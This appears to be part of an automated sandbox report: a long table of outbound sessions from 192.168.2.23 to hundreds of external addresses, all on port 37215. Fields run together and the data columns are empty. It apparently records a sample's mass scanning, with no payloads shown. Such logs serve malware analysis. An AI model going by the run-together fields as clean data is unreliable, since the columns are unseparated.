                                          10674192.168.2.2340058157.241.213.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10675192.168.2.2352846157.223.229.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10676192.168.2.2346220197.203.64.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10677192.168.2.233714812.149.170.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10678192.168.2.2346656165.164.143.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10679192.168.2.2350990197.242.122.20037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10680192.168.2.2358810157.165.216.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10681192.168.2.2353180197.107.45.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10682192.168.2.2344000200.212.106.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10683192.168.2.235754441.172.74.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10684192.168.2.2352242157.191.51.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10685192.168.2.235735478.152.44.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10686192.168.2.233644241.243.21.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10687192.168.2.2347804157.106.109.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10688192.168.2.2345536197.230.220.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10689192.168.2.2336188157.90.234.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10690192.168.2.2351228197.247.11.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10691192.168.2.2338412119.100.146.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10692192.168.2.2354530157.153.237.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10693192.168.2.234592641.192.62.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10694192.168.2.233276841.190.26.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10695192.168.2.2359326157.113.234.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10696192.168.2.2348028157.40.90.16737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10697192.168.2.235636041.108.65.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10698192.168.2.2359558197.161.201.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10699192.168.2.235516858.198.245.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10700192.168.2.2354226205.146.206.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10701192.168.2.233298670.74.6.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10702192.168.2.2347160157.202.156.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10703192.168.2.235711641.12.128.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10704192.168.2.2351622157.96.132.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10705192.168.2.2355940197.182.237.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10706192.168.2.2341514157.85.45.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10707192.168.2.2350900157.227.229.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10708192.168.2.2343932157.248.203.13437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10709192.168.2.2341962198.221.110.20937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10710192.168.2.235192641.239.132.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10711192.168.2.23607942.118.142.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10712192.168.2.2358708157.0.80.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10713192.168.2.233587885.224.217.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10714192.168.2.2335204197.69.159.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10715192.168.2.233647836.43.233.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10716192.168.2.235966841.113.70.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10717192.168.2.2345688197.152.69.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10718192.168.2.2342382197.248.35.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10719192.168.2.235948841.54.127.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10720192.168.2.2359272197.102.13.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10721192.168.2.2360092157.142.212.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10722192.168.2.2344580157.145.16.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10723192.168.2.235501841.124.197.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10724192.168.2.2354436197.199.67.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10725192.168.2.234681041.0.105.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10726192.168.2.234483441.238.136.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10727192.168.2.2334756197.68.120.5737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10728192.168.2.235674041.113.241.22137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10729192.168.2.2357132157.162.55.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10730192.168.2.234971813.177.209.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10731192.168.2.2353172157.133.51.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10732192.168.2.2343196157.133.255.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10733192.168.2.2358938157.157.123.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10734192.168.2.2352044157.200.143.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10735192.168.2.235024241.80.28.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10736192.168.2.2341512157.120.81.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10737192.168.2.2350538197.162.139.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10738192.168.2.235728641.203.30.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10739192.168.2.2341910157.149.209.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10740192.168.2.2344330157.37.185.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10741192.168.2.2347468197.35.180.25137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10742192.168.2.2336024197.109.215.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10743192.168.2.234742241.75.88.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10744192.168.2.2348426197.222.125.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10745192.168.2.233509841.23.108.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10746192.168.2.2357484157.59.60.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10747192.168.2.2358228157.5.160.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10748192.168.2.2347936157.72.21.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10749192.168.2.2355556197.118.242.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10750192.168.2.2357478157.202.86.7737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10751192.168.2.2336440157.96.246.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10752192.168.2.235255241.54.140.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10753192.168.2.236056641.27.31.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10754192.168.2.235188441.163.107.19937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10755192.168.2.2333628197.211.12.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10756192.168.2.235245441.159.57.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10757192.168.2.2344694197.47.161.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10758192.168.2.23584981.107.60.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10759192.168.2.2353256197.140.47.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10760192.168.2.2349268157.16.53.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10761192.168.2.233370814.170.18.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10762192.168.2.234193042.0.89.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10763192.168.2.2339456197.189.68.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10764192.168.2.2342340197.3.85.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10765192.168.2.2355400157.228.226.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10766192.168.2.2349246125.123.74.9737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10767192.168.2.233565479.124.101.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10768192.168.2.234534257.137.80.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10769192.168.2.2350258197.45.7.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10770192.168.2.2360268197.23.31.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10771192.168.2.2353190157.223.26.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10772192.168.2.2343230197.92.193.15837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10773192.168.2.2333674157.19.62.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10774192.168.2.235944841.236.248.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10775192.168.2.235165241.71.90.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10776192.168.2.235586431.78.213.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10777192.168.2.233646841.169.235.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10778192.168.2.2335240157.95.46.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10779192.168.2.2343306157.175.69.8637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10780192.168.2.2348760197.188.19.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10781192.168.2.233650841.179.214.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10782192.168.2.2339084197.58.230.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10783192.168.2.234963441.116.20.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10784192.168.2.2356098197.162.239.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10785192.168.2.2360062197.210.192.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10786192.168.2.234869841.243.130.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10787192.168.2.2356562197.94.194.10937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10788192.168.2.2342992157.184.246.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10789192.168.2.2334276202.54.124.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10790192.168.2.2351664157.242.195.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10791192.168.2.2341502157.8.4.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10792192.168.2.234898896.35.50.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10793192.168.2.235592432.202.217.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10794192.168.2.2342738197.173.18.22337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10795192.168.2.2346312197.51.57.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10796192.168.2.235743041.233.56.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10797192.168.2.2334312197.61.241.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10798192.168.2.2344848159.30.2.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10799192.168.2.2351826157.48.23.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10800192.168.2.2335838157.164.65.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10801192.168.2.23342705.40.213.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10802192.168.2.235403241.3.106.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10803192.168.2.2347348197.8.119.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10804192.168.2.235969041.204.87.12937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10805192.168.2.235433480.81.7.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10806192.168.2.234472625.8.132.24237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10807192.168.2.234021041.148.87.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10808192.168.2.23525225.122.15.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10809192.168.2.2357338197.54.143.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10810192.168.2.236009041.231.151.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10811192.168.2.233470413.133.198.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10812192.168.2.2338234157.104.94.21737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10813192.168.2.2350350157.19.30.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10814192.168.2.2353292157.210.21.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10815192.168.2.2341006197.73.219.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10816192.168.2.2346716197.160.197.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10817192.168.2.2358584197.79.147.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10818192.168.2.235049841.145.94.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10819192.168.2.2357836197.120.5.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10820192.168.2.2343796157.57.148.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10821192.168.2.2347920197.197.194.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10822192.168.2.235394441.26.240.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10823192.168.2.234495641.196.152.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10824192.168.2.2343920157.131.70.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10825192.168.2.233597841.200.78.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10826192.168.2.2360658157.200.17.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10827192.168.2.233786818.154.47.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10828192.168.2.2357696197.241.224.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10829192.168.2.2333644197.120.222.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10830192.168.2.2351364187.231.88.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10831192.168.2.2351372123.20.64.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10832192.168.2.2346056157.229.212.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10833192.168.2.233540641.245.5.15137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10834192.168.2.235996253.230.120.1237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10835192.168.2.234367440.37.205.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10836192.168.2.2349904197.96.18.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10837192.168.2.2357156197.101.136.23337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10838192.168.2.2357562207.122.11.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10839192.168.2.234906841.65.221.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10840192.168.2.2349310197.236.187.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10841192.168.2.2333870197.99.130.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10842192.168.2.2340670197.240.55.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10843192.168.2.2355036157.121.187.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10844192.168.2.2343308197.105.215.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10845192.168.2.233989641.125.97.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10846192.168.2.2348232197.199.69.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10847192.168.2.2342906157.26.19.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10848192.168.2.2355728157.246.46.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10849192.168.2.235083041.138.154.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10850192.168.2.234384870.139.242.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10851192.168.2.2346566157.168.110.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10852192.168.2.236010441.8.131.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10853192.168.2.235142440.125.146.25337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10854192.168.2.2339020157.95.213.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10855192.168.2.2348660157.195.97.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10856192.168.2.2344628157.120.86.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10857192.168.2.2348086157.217.165.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10858192.168.2.2342122110.40.217.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10859192.168.2.2333814221.108.17.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10860192.168.2.2348434197.24.137.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10861192.168.2.235892841.85.58.11737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10862192.168.2.234705841.252.242.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10863192.168.2.235189041.12.130.22437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10864192.168.2.235023813.46.210.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10865192.168.2.234560832.6.253.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10866192.168.2.2333020197.81.42.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10867192.168.2.2360036197.45.31.18637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10868192.168.2.2357780157.121.108.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10869192.168.2.2347886120.123.220.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10870192.168.2.2353262123.46.216.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10871192.168.2.233842641.38.113.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10872192.168.2.2342324170.18.13.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10873192.168.2.234729641.2.208.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10874192.168.2.2338756197.226.129.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10875192.168.2.234008441.92.12.17037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10876192.168.2.2343452197.201.7.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10877192.168.2.2335076197.52.107.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10878192.168.2.2354498197.58.8.8337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10879192.168.2.235663841.158.243.5537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10880192.168.2.235824682.19.93.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10881192.168.2.2337778197.43.130.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10882192.168.2.234492041.58.217.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10883192.168.2.235033241.245.249.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10884192.168.2.2346726157.228.162.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10885192.168.2.23454164.92.182.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10886192.168.2.2335672197.2.247.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10887192.168.2.2338720157.176.196.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10888192.168.2.2349588197.220.95.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10889192.168.2.234558441.5.212.25437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10890192.168.2.2348430157.145.61.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10891192.168.2.2342176157.37.85.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10892192.168.2.2335432197.110.14.16537215
                                          TimestampBytes transferredDirectionData


